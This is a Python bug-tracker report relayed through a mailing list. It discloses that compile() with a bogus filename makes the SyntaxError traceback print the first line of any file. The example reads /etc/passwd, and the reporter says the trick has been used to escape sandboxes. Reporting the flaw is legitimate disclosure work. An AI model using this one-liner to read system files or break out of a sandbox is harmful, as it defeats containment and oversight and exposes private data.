New submission from Koh <[email protected]>:
By specifying a filename in the compile function and then improperly
terminating it, we are able to return the first line of any file.
>> compile('yield', '/etc/passwd', 'exec')
File "/etc/passwd", line 1
root:x:0:0:root:/root:/bin/bash
^
SyntaxError: 'yield' outside function
Is this intended behavior? I have been able to use it to escape sandboxes.
----------
messages: 357906
nosy: iso
priority: normal
severity: normal
status: open
title: `compile` returns the first line of file on termination
type: security
versions: Python 2.7, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue38985>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
